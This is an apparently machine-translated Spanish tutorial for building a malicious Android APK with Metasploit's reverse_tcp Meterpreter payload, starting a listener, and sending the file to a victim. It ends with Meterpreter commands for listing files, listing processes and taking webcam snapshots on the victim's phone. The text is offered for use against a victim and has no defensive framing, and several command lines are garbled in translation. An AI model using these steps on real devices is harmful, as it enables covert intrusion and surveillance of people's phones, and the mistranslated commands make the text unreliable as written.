Abrir Terminal de Kali Linux

msfpayload android / meterpreter / reverse_tcp lhost = 192.168.1.6 lport = 443 R> / root / Escritorio / files.apk

-P para la carga útil android / meterpreter / reverse_tcp
Lhost (dirección IP de su servidor local) 192.168.1.6
Lport (puerto de su PC local) 443
Formato-R Formato de salida

Ahora generamos con éxito el malicioso apk del archivo, se almacena en el equipo local

/ Root / Escritorio / files.apk

Ahora abre tu terminal de linux kli y escriba msfconsole

Ahora tenemos que definir un detector para manejar la conexión reversa enviado por la víctima cuando el exploit ejecutado con éxito.

uso exploit / multi / handler

android conjunto de carga útil / meterpreter / reverse_tcp

establecer 192.168.1.6 lhost

establecer lport 443

explotar

Ahora enviar sus files.apk archivos a la víctima, tan pronto como se descarga y abrirlo. Ahora usted puede tener acceso shell meterpreter en víctima teléfono Android .

LS

Al igual que en Linux, los ' ls 'comando listará los archivos en el directorio remoto actual.

PS

El ' ps comando 'muestra una lista de procesos que se ejecutan en el objetivo.

Webcam_list

Este comando le proporciona una lista de todas las webcams en el sistema de destino. Cada cámara web tendrá un número de índice.

Webcam_snap 1

Este comando toma una instantánea de la cámara web se especifica, por defecto el número 1 y tratará sin argumento precision para abrir la instantánea guardada